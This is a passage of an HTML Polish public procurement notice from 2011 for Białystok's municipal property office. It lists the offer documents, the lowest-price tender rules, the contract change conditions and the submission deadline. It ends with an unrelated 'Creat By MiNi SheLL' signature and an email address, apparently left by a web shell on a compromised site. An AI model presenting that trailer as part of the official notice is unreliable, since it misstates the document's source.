1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 1 do SIWZ,
2)	wypełniony formularz cenowy - wg załączonego wzoru załącznik nr 7.1; 7.2; 7.3; 7.4, 7.5 
do SIWZ,
3)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W uzasadnionych przypadkach niezależnych od Wykonawcy, spowodowanych między innymi brakiem dostępu do lokalu Zamawiający dopuszcza możliwość zmiany terminu realizacji zamówienia o ustalony przez strony czas niezbędny do prawidłowego wykonania zamówienia. 
	Dopuszcza się zmianę wynagrodzenia określonego w ust. 1 w następujących przypadkach:
a)	zmiany stawki podatku VAT wynikająca z obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego 15-370 Białystok ul. gen. J. Bema 89/1 -pok. 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2011 godzina 09:00, miejsce: Zarząd Mienia Komunalnego 15-370 Białystok ul. gen. J. Bema 89/1 -pok. 201-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com